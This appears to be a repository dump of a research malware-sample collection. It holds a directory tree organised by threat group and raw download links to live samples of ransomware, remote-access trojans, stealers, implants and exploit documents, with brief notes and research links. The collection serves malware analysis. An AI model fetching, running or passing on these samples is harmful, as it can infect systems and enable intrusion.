├── APT28 ├── APT28,NATOPAPER,SOFACY2004.bin ├── APT28DecoyDocument.doc ├── APT28DropperExcelDoc.xls ├── APT28Hospital.doc ├── APT28Implant.bin ├── APT28wmsApplication.exe ├── Backdoor.XTunnel.exe ├── DNC │ ├── VmUpgradeHelper.exeImplant.exe │ └── VmUpgradeHelper.exeX-Tunnel implant.exe ├── FancyBearZekapab.bin ├── FancyBearZekapabImplant.bin ├── FancyImplant.bin ├── LoJaxInfo_EFI.exe ├── LoJaxKernelDriver.bin ├── LoJaxSmallAgent.exe ├── LoJaxSmall_AgentDLL.exe ├── MacOSKomplexFancyBear.bin ├── X-AgentTrojan.bin ├── Xagent64.bin ├── ZekaAPT28.bin ├── ZekapabImplant.bin ├── ctlnetw.bin ├── rpcnetp.exe.bin ├── rpcnetpLojack.dll.bin └── twain_64DLL.dll ├── APT29 ├── APT29miniduke.bin ├── CozyBearImplant.bin ├── CozyBearNov2018New! │ ├── AudioSes.dll │ ├── CozybearNov2018Activity.txt │ ├── ds7001.zip │ ├── ds7002.bin │ └── ds7002.zip ├── ImplantCozy.bin ├── MinidukeAPT29.bin ├── SeaDaddyImplant (2).bin ├── SeaDaddyImplant.bin ├── TrojanCozyBear.bin └── atiagentCozyBear.bin ├── APT32 ├── APT32Info.txt ├── McUtil.dll ├── OceanLotusBackDoor.bin.gz ├── WinWord.bin.gz ├── rastls.dll.bin.gz └── 【CVE-2020-0688】-721254f41286717aa1cd9d7d652a9fa1 ├── APT34 ├── MagicHoundAPT34.doc ├── OilRigThreeDollars.bin ├── OilrigThreeDollarsMacro.bin └── QUADAGENTPowershell.bin ├── APT37 └── Final1stspy,Dropper.bin ├── APT40 ├── info.txt ├── 【CVE-2014-6352】-01b5276fdfda2043980cbce19117aaa0 ├── 【CVE-2014-6352】-3ca84fe6cec9bf2e2abac5a8f1e0a8d2 ├── 【CVE-2014-6352】-3cb38f7574e8ea97db53d3857830fcc4 ├── 【CVE-2014-6352】-4c89d5d8016581060d9781433cfb0bb5 ├── 【CVE-2014-6352】-6889c7905df000b874bfc2d782512877.docx ├── 【CVE-2014-6352】-7233ad2ba31d98ff5dd47db1b5a9fe7c.docx ├── 【CVE-2014-6352】-ae342bf6b1bd0401a42aae374f961fc6.bin └── 【CVE-2014-6352】-f744481a4c4a7c811ffc7dee3b58b1ff.docx ├── APT41 ├── info.txt └── 【CVE-2020-10189】-3e856162c36b532925c8226b4ed3481c.bin ├── APTC23 ├── APT-C-23Info.txt ├── HexDownload.exe.bin └── MicropsiaRAT2018.bin ├── AZORult ├── info.txt ├── 
【CVE-2017-11882】-1cc146d47918d23cee86a97c77f87918.doc ├── 【CVE-2017-11882】-2215746f9888586acd5d32fd7a5440da.xlsx ├── 【CVE-2017-11882】-38649c7c2632f009b6d6c49da1b95708.doc ├── 【CVE-2017-11882】-42fb7157bd91775b9e8382c7ee500580 ├── 【CVE-2017-11882】-486689c6ce47a8dae0d3c5dcfcde492e.doc ├── 【CVE-2017-11882】-ab942ccd03d1beae01871f0874467d43.xlsx └── 【CVE-2017-11882】-d8c3d71cf3a518c09a3eee72521ddad8 ├── CVE-2018-15982 ├── 22.bin ├── 33.bin └── GreatArticle.txt ├── Coinminers ├── AndroidBitcoinMiner.bin ├── PowerGhostMiner.bin ├── TrojanminerWin64.bin ├── msxml.exe └── pBotminer.bin ├── DPRK ├── BackdoorDLLworm.bin ├── BackdoorHiddenCobra.bin ├── BackdoorWormSMB2.0.exe ├── HiddenCobra.exe ├── HiddenCobraJoanap.bin ├── MoneroNorthKoreaPyongynag.bin ├── North Korea NavRat June 2018 │ ├── Application.bin │ ├── DLL#1.bin │ └── DLL#2.bin ├── RedDawnSunTeamAndroid.apk ├── SunTeamAndroid.apk └── SunTeamRedDawn.apk ├── DarkHydrus ├── DarkHydrus.bin ├── DarkHydrusImplant.bin ├── DarkHydrusInfo.txt ├── DarkHydrusPayload.bin ├── DarkHydrusPowershellScript.bin └── RogueRobinPowershellPayloadObfuscated.bin ├── DarkTequila └── DarkTequila.exe ├── DoquAPT └── DoquDropper.bin ├── Dridex ├── Dridex2ndstage.exe.bin ├── DridexDDEDropperdoc.bin ├── DridexInformation.txt ├── DridexbankerPacked.bin ├── dridexDroppedVBS.bin ├── dridexLoader.bin.exe.bin ├── dridexbanker.false └── dridexbankerzip.zip ├── DustSquad ├── DustSquadInformation.txt ├── OctopusDelphi.exe └── OctopusTelegramMessengerDropper.bin ├── Emotet └── EmotetInvoiceDoc.bin ├── EnergeticBear ├── BerserkBear Downloader.bin ├── Energetic Bear Implant └── Temp.IsotopeImplant.bin ├── EquationGroup ├── DiskFromHoustonEoPExploits.bin ├── DoubleFantasyInstaller.bin ├── EquationDrugLUTEUSOBSTOS ├── EquationGroupInfo.txt ├── EquationLaserInstaller.bin ├── FannyWorm.bin ├── GrayfishInstaller.bin ├── GrokKeylogger ├── HDDFirmware ├── SD_IP_CF.dll.bin └── TripleFantasy.bin ├── GamaredonGroup ├── GamaredonGroupINFO.txt ├── GamaredonImplant.bin 
├── Pteranodon.bin ├── Pteranodon2.bin ├── Pteranodon3.bin ├── Pteranodon4.bin ├── Pteranodon5.bin ├── Pteranodon6.bin ├── PteranodonImplant.bin ├── PteranodonImplant7.bin └── photoshopimplant.bin ├── GandCrab ├── GandCrab v5.1(Include Decrypt Tools).zip ├── GandCrabV5.0.4.exe ├── GandCrabVariant.false ├── GandCrabv4.exe ├── GandCrabv5RandomExtension.bin ├── Gandcrab5.0.2.bin ├── Gandcrab5.0.3.exe ├── GandcrabV5.0.5.bin └── Gandcrabv5.0.2exe.bin ├── GazaAPTGroup ├── GazaGroupImplant.bin ├── GazaGroupInfo.txt ├── ImplantBigBang.bin ├── TheBigBang.bin ├── TheBigBangAPT.doc └── TheBigBangImplant.bin ├── Globelmposter ├── Globelmposter 3.0 .rar ├── GoziGroup ├── GoziBankerISFB.exe ├── HeVRmuUO.exe_.exe ├── KRKeMaIts.exe_.exe ├── lsPEcswsco.exe_.exe └── vCfjTmdR.exe_.exe ├── GreenbugAPT ├── GreenBugInfostealer.bin ├── Greenbug.bin ├── GreenbugAPTx64.bin ├── GreenbugInfo.txt └── ISMDoorx64.bin ├── GreyEnergyAPT ├── GreyEnergyDropper.bin ├── GreyEnergyDropper.doc ├── GreyEnergyDropper2.bin ├── GreyEnergyImplant2018.bin └── GreyEnergymini.bin ├── Hancitor ├── info.txt └── 【CVE-2017-11882】-b3d345b26d3fb6e05f1ad38668a649f9 ├── Lazarus IOC (20231027) ├── Lazarus IOC (20231101) ├── Lazarus IOC (20231108) ├── Lazarus IOC(20240511) ├── Lazarus(20231124).xlsx ├── Lazarus(20231127) ├── Lazarus ├── BlueNoroff_INK.zip ├── DangerousPassword.pdf ├── LazarusMacOS.bin.xltd ├── LazarusMacOS.bin.xltd.cfg ├── RyukRansomware.bin └── elfLazarus.bin ├── Lazarus_IOC(20240424) ├── Lazarus_IOC(20240528) ├── MiddleEastMalware ├── AndroidMalware.bin.xltd ├── AndroidMalware.bin.xltd.cfg └── EgyptianPDF.bin ├── MuddyWaterAPT ├── Cv.doc.bin ├── MuddyWaterAPTInformation.txt ├── shakva-lb.doc.bin └── 【CVE-2017-0199】-b41e0c8a2ce8e9de32b9f62b7c3ca047.docx ├── OlympicDestroyer ├── OlympicDestroyer.bin ├── OlympicDestroyerAtos.bin ├── OlympicSystemStealer.bin └── OlympicsSouthKorea.bin ├── README.md ├── Ransomeware ├── DharmaRansomware.bin ├── DistrictRansomware.bin ├── FoxRansomware.zip ├── 
KatyushaRansomware.bin ├── KrakenCryptor2.0.bin ├── MINOTAURransomware.false ├── MatrixRansomware.bin ├── NotPetya.bin ├── README ├── WannaCry.exe ├── WannaCry2.exe ├── WannaCryDLL.bin ├── __README__.txt ├── mcrypt.bin └── samsamRansomware.bin ├── Remcos RAT.zip ├── SLINGSHOT └── SlingShot.bin ├── SilverTerrier ├── info.txt ├── 【CVE-2017-11882】-4972fac34f773668a523ef51b4898387 ├── 【CVE-2017-11882】-4a84e57f0b3e7868cea1904cce9c1c7e ├── 【CVE-2017-11882】-62523aaf31e6d489bdca6d74d19a1927 ├── 【CVE-2017-11882】-c1b04a9474ca64466ad4327546c20efc └── 【CVE-2017-11882】-dd0802b2a4c476917099862193e7ab08 ├── Stuxnet Malware ├── A0055521.sys ├── Copy of Shortcut to.lnk ├── KRvW5H2T.htm ├── index (1).html ├── index.html ├── malware.ex_ ├── ~WTR4132.tmp └── ~WTR4141.tmp ├── Triton ├── TRISIS-TRITON-HATMAN-master.zip └── TritonCRC.bin ├── Trojans ├── FormbookStealer.false ├── GlLgNm3t.htm ├── NanocoreRAT.bin ├── PasswordStealer.NET.bin ├── Razylokibot.bin └── Trickbotpwgrab.bin ├── Turla ├── CarbonImplant.bin ├── KazuarRAT.bin ├── NCSC.bin ├── Nautilus Implant.bin ├── NeuronImplant2018.bin ├── OutlookBackdoor.bin ├── OutlookBackdoor2.bin ├── TurlaAgent.exe ├── TurlaDropper.bin ├── TurlaKeylogger.bin └── TurlaSnakeImplant.bin ├── UNC1945 ├── info.txt └── 【CVE-2019-0708】-6983f7001de10f4d19fc2d794c3eb534 ├── UPXsamples ├── MiraiELFBackdoorUPX.bin ├── PackedRansomwareUPX.bin ├── ProcessHowllowingPacked.bin ├── SaturnRansomewareUPX.bin ├── ScarabRansomwareUPX.exe ├── TrojanUPXPacked.bin ├── Unlock26RansomewarePacked.bin ├── arsstealersafeloaderUPX.exe └── yodascrypterUPX.bin ├── VoodooBearAPT ├── BlackEnergy.bin └── BlackEnergyImplant.bin ├── WizardOpium ├── info.txt └── 【CVE-2019-13720】-efd360e7b2f576349a350d5fa5c75740 .bin ├── __APTGroupInfoLinks.txt__ ├── __DO NOT RUN SAMPLES ON YOUR HOST COMPUTER! 
USE A VIRTUAL MACHINE__.txt └── __README__.txt /APT28/APT28,NATOPAPER,SOFACY2004.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28,NATOPAPER,SOFACY2004.bin -------------------------------------------------------------------------------- /APT28/APT28DecoyDocument.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28DecoyDocument.doc -------------------------------------------------------------------------------- /APT28/APT28DropperExcelDoc.xls: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28DropperExcelDoc.xls -------------------------------------------------------------------------------- /APT28/APT28Hospital.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28Hospital.doc -------------------------------------------------------------------------------- /APT28/APT28Implant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28Implant.bin -------------------------------------------------------------------------------- /APT28/APT28wmsApplication.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/APT28wmsApplication.exe -------------------------------------------------------------------------------- /APT28/Backdoor.XTunnel.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/Backdoor.XTunnel.exe -------------------------------------------------------------------------------- /APT28/DNC/VmUpgradeHelper.exeImplant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/DNC/VmUpgradeHelper.exeImplant.exe -------------------------------------------------------------------------------- /APT28/DNC/VmUpgradeHelper.exeX-Tunnel implant.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/DNC/VmUpgradeHelper.exeX-Tunnel implant.exe -------------------------------------------------------------------------------- /APT28/FancyBearZekapab.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/FancyBearZekapab.bin -------------------------------------------------------------------------------- /APT28/FancyBearZekapabImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/FancyBearZekapabImplant.bin -------------------------------------------------------------------------------- /APT28/FancyImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/FancyImplant.bin -------------------------------------------------------------------------------- /APT28/LoJaxInfo_EFI.exe: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/LoJaxInfo_EFI.exe -------------------------------------------------------------------------------- /APT28/LoJaxKernelDriver.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/LoJaxKernelDriver.bin -------------------------------------------------------------------------------- /APT28/LoJaxSmallAgent.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/LoJaxSmallAgent.exe -------------------------------------------------------------------------------- /APT28/LoJaxSmall_AgentDLL.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/LoJaxSmall_AgentDLL.exe -------------------------------------------------------------------------------- /APT28/MacOSKomplexFancyBear.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/MacOSKomplexFancyBear.bin -------------------------------------------------------------------------------- /APT28/X-AgentTrojan.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/X-AgentTrojan.bin -------------------------------------------------------------------------------- /APT28/Xagent64.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/Xagent64.bin -------------------------------------------------------------------------------- /APT28/ZekaAPT28.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/ZekaAPT28.bin -------------------------------------------------------------------------------- /APT28/ZekapabImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/ZekapabImplant.bin -------------------------------------------------------------------------------- /APT28/ctlnetw.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/ctlnetw.bin -------------------------------------------------------------------------------- /APT28/rpcnetp.exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/rpcnetp.exe.bin -------------------------------------------------------------------------------- /APT28/rpcnetpLojack.dll.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/rpcnetpLojack.dll.bin -------------------------------------------------------------------------------- /APT28/twain_64DLL.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT28/twain_64DLL.dll 
-------------------------------------------------------------------------------- /APT29/APT29miniduke.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/APT29miniduke.bin -------------------------------------------------------------------------------- /APT29/CozyBearImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/CozyBearImplant.bin -------------------------------------------------------------------------------- /APT29/CozyBearNov2018New!/AudioSes.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/CozyBearNov2018New!/AudioSes.dll -------------------------------------------------------------------------------- /APT29/CozyBearNov2018New!/CozybearNov2018Activity.txt: -------------------------------------------------------------------------------- 1 | AudioSes.dll - .DLL 2 | 3 | ds7001.zip - Contains Dropped PDF 4 | 5 | ds7002.bin - .lnk file that drops a PowerShell script 6 | 7 | ds7002.zip - Contains Dropped PDF -------------------------------------------------------------------------------- /APT29/CozyBearNov2018New!/ds7001.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/CozyBearNov2018New!/ds7001.zip -------------------------------------------------------------------------------- /APT29/CozyBearNov2018New!/ds7002.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/CozyBearNov2018New!/ds7002.bin -------------------------------------------------------------------------------- /APT29/CozyBearNov2018New!/ds7002.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/CozyBearNov2018New!/ds7002.zip -------------------------------------------------------------------------------- /APT29/ImplantCozy.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/ImplantCozy.bin -------------------------------------------------------------------------------- /APT29/MinidukeAPT29.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/MinidukeAPT29.bin -------------------------------------------------------------------------------- /APT29/SeaDaddyImplant (2).bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/SeaDaddyImplant (2).bin -------------------------------------------------------------------------------- /APT29/SeaDaddyImplant.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/SeaDaddyImplant.bin -------------------------------------------------------------------------------- /APT29/TrojanCozyBear.bin: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/TrojanCozyBear.bin -------------------------------------------------------------------------------- /APT29/atiagentCozyBear.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT29/atiagentCozyBear.bin -------------------------------------------------------------------------------- /APT32/APT32Info.txt: -------------------------------------------------------------------------------- 1 | https://www.welivesecurity.com/wp-content/uploads/2018/03/ESET_OceanLotus.pdf 2 | 3 | https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor -------------------------------------------------------------------------------- /APT32/McUtil.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT32/McUtil.dll -------------------------------------------------------------------------------- /APT32/OceanLotusBackDoor.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT32/OceanLotusBackDoor.bin.gz -------------------------------------------------------------------------------- /APT32/WinWord.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT32/WinWord.bin.gz -------------------------------------------------------------------------------- /APT32/rastls.dll.bin.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT32/rastls.dll.bin.gz 
-------------------------------------------------------------------------------- /APT32/【CVE-2020-0688】-721254f41286717aa1cd9d7d652a9fa1: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT32/【CVE-2020-0688】-721254f41286717aa1cd9d7d652a9fa1 -------------------------------------------------------------------------------- /APT34/MagicHoundAPT34.doc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT34/MagicHoundAPT34.doc -------------------------------------------------------------------------------- /APT34/OilRigThreeDollars.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT34/OilRigThreeDollars.bin -------------------------------------------------------------------------------- /APT34/OilrigThreeDollarsMacro.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT34/OilrigThreeDollarsMacro.bin -------------------------------------------------------------------------------- /APT34/QUADAGENTPowershell.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT34/QUADAGENTPowershell.bin -------------------------------------------------------------------------------- /APT37/Final1stspy,Dropper.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT37/Final1stspy,Dropper.bin 
-------------------------------------------------------------------------------- /APT40/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-01b5276fdfda2043980cbce19117aaa0: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-01b5276fdfda2043980cbce19117aaa0 -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-3ca84fe6cec9bf2e2abac5a8f1e0a8d2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-3ca84fe6cec9bf2e2abac5a8f1e0a8d2 -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-3cb38f7574e8ea97db53d3857830fcc4: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-3cb38f7574e8ea97db53d3857830fcc4 -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-4c89d5d8016581060d9781433cfb0bb5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-4c89d5d8016581060d9781433cfb0bb5 -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-6889c7905df000b874bfc2d782512877.docx: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-6889c7905df000b874bfc2d782512877.docx -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-7233ad2ba31d98ff5dd47db1b5a9fe7c.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-7233ad2ba31d98ff5dd47db1b5a9fe7c.docx -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-ae342bf6b1bd0401a42aae374f961fc6.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-ae342bf6b1bd0401a42aae374f961fc6.bin -------------------------------------------------------------------------------- /APT40/【CVE-2014-6352】-f744481a4c4a7c811ffc7dee3b58b1ff.docx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT40/【CVE-2014-6352】-f744481a4c4a7c811ffc7dee3b58b1ff.docx -------------------------------------------------------------------------------- /APT41/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /APT41/【CVE-2020-10189】-3e856162c36b532925c8226b4ed3481c.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APT41/【CVE-2020-10189】-3e856162c36b532925c8226b4ed3481c.bin 
-------------------------------------------------------------------------------- /APTC23/APT-C-23Info.txt: -------------------------------------------------------------------------------- 1 | https://research.checkpoint.com/interactive-mapping-of-apt-c-23/ -------------------------------------------------------------------------------- /APTC23/HexDownload.exe.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APTC23/HexDownload.exe.bin -------------------------------------------------------------------------------- /APTC23/MicropsiaRAT2018.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/APTC23/MicropsiaRAT2018.bin -------------------------------------------------------------------------------- /AZORult/info.txt: -------------------------------------------------------------------------------- 1 | File Naming Convention : CVE of sample utilization - Sample MD5 2 | -------------------------------------------------------------------------------- /AZORult/【CVE-2017-11882】-2215746f9888586acd5d32fd7a5440da.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/AZORult/【CVE-2017-11882】-2215746f9888586acd5d32fd7a5440da.xlsx -------------------------------------------------------------------------------- /AZORult/【CVE-2017-11882】-ab942ccd03d1beae01871f0874467d43.xlsx: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/AZORult/【CVE-2017-11882】-ab942ccd03d1beae01871f0874467d43.xlsx -------------------------------------------------------------------------------- 
/AZORult/【CVE-2017-11882】-d8c3d71cf3a518c09a3eee72521ddad8: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/AZORult/【CVE-2017-11882】-d8c3d71cf3a518c09a3eee72521ddad8 -------------------------------------------------------------------------------- /CVE-2018-15982/22.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/CVE-2018-15982/22.bin -------------------------------------------------------------------------------- /CVE-2018-15982/33.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/CVE-2018-15982/33.bin -------------------------------------------------------------------------------- /CVE-2018-15982/GreatArticle.txt: -------------------------------------------------------------------------------- 1 | https://ti.360.net/blog/articles/flash-0day-hacking-team-rat-activities-of-exploiting-latest-flash-0day-vulnerability-and-correlation-analysis-en/ -------------------------------------------------------------------------------- /Coinminers/AndroidBitcoinMiner.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Coinminers/AndroidBitcoinMiner.bin -------------------------------------------------------------------------------- /Coinminers/PowerGhostMiner.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Coinminers/PowerGhostMiner.bin -------------------------------------------------------------------------------- 
/Coinminers/TrojanminerWin64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Coinminers/TrojanminerWin64.bin -------------------------------------------------------------------------------- /Coinminers/msxml.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Coinminers/msxml.exe -------------------------------------------------------------------------------- /Coinminers/pBotminer.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/Coinminers/pBotminer.bin -------------------------------------------------------------------------------- /DPRK/BackdoorDLLworm.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/BackdoorDLLworm.bin -------------------------------------------------------------------------------- /DPRK/BackdoorHiddenCobra.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/BackdoorHiddenCobra.bin -------------------------------------------------------------------------------- /DPRK/BackdoorWormSMB2.0.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Cherishao/APT-Sample/7ad330aa02d064892f8f3853d8a8be532efab52f/DPRK/BackdoorWormSMB2.0.exe -------------------------------------------------------------------------------- /DPRK/HiddenCobra.exe: -------------------------------------------------------------------------------- 
